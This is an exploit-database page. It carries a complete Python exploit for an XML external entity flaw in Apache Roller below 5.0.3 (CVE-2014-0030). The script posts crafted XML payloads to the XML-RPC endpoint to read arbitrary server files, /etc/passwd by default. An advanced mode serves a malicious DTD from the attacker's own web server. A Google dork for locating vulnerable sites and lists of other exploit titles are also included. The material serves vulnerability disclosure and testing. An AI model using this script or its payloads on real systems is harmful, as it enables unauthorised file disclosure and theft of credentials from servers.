Menu

Search for hundreds of thousands of exploits

"Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)"

Author

Exploit author

"Marko Jokic"

Platform

Exploit platform

linux

Release date

Exploit published date

2018-09-06

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
# Exploit Title: Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)
# Google Dork: intext:"apache roller weblogger version {vulnerable_version_number}"
# Date: 2018-09-05
# Exploit Author: Marko Jokic
# Contact: http://twitter.com/_MarkoJokic
# Vendor Homepage: http://roller.apache.org/
# Software Link: http://archive.apache.org/dist/roller/
# Version: < 5.0.3
# Tested on: Linux Ubuntu 14.04.1
# CVE : CVE-2014-0030

# This exploit lets you read almost any file on a vulnerable server via XXE vulnerability.
# There are two types of payload this exploit is able to use, 'SIMPLE' & 'ADVANCED'.
# 'SIMPLE' payload will work in most cases and will be used by default, if
# server errors out, use 'ADVANCED' payload.
# 'ADVANCED' payload will start local web server and serve malicious XML which
# will be parsed by a target server.
# To successfully perform attack with 'ADVANCED' payload, make sure that port
# you listen on (--lport flag) is accessible out of the network.

#!/usr/bin/env python

import SimpleHTTPServer
import SocketServer
import argparse
import sys
import threading
from xml.etree import ElementTree
import urllib3

import requests

SIMPLE_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file://{}">]>
<methodCall>
   <methodName>&xxe;</methodName>
</methodCall>
"""

ADVANCED_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY % start "<![CDATA[">
<!ENTITY % xxe SYSTEM "file://{}">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "{}">
%dtd;
]>
<methodCall>
   <methodName>&all;</methodName>
</methodCall>
"""

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.end_headers()
        self.wfile.write('<!ENTITY all "%start;%xxe;%end;">')

def check_exploit(host):
    response = requests.post(host + "/roller-services/xmlrpc", verify=False)
    if response.status_code == 200:
        return True
    return False

def exploit(host, payload):
    response = requests.post(host + "/roller-services/xmlrpc", data=payload, verify=False)
    xml_tree = ElementTree.fromstring(response.text)
    parsed_response = xml_tree.findall("fault/value/struct/member")[1][1].text
    print parsed_response

def start_web_server(port):
    handler = MyHandler
    httpd = SocketServer.TCPServer(('', port), handler, False)
    httpd.allow_reuse_address = True
    httpd.server_bind()
    httpd.server_activate()
    httpd.handle_request()
    httpd.shutdown()

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', metavar="URL", dest="url", required=True, help="Target URL")
    parser.add_argument('-f', metavar='FILE', dest="file", required=False, default="/etc/passwd", help="File to read from server")
    parser.add_argument('--lhost', required='--rport' in sys.argv, help="Your IP address for http web server")
    parser.add_argument('--lport', type=int, required='--rhost' in sys.argv, help="Port for web server to listen on")
    args = parser.parse_args()

    host = args.url
    full_file_path = args.file

    advanced = False
    lhost = args.lhost
    lport = args.lport

    if lport is not None and lport is not None:
        advanced = True

    check = check_exploit(host)

    if check:
        if advanced:
            th = threading.Thread(target=start_web_server, args=(lport,))
            th.daemon = True
            th.start()

            payload = ADVANCED_PAYLOAD.format(full_file_path, "http://{}:{}".format(lhost, lport))
        else:
            payload = SIMPLE_PAYLOAD.format(full_file_path)

        exploit(host, payload)
    else:
        print "[-] TARGET IS NOT VULNERABLE!"

main()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2018-09-06 "Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)" webapps linux "Marko Jokic" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected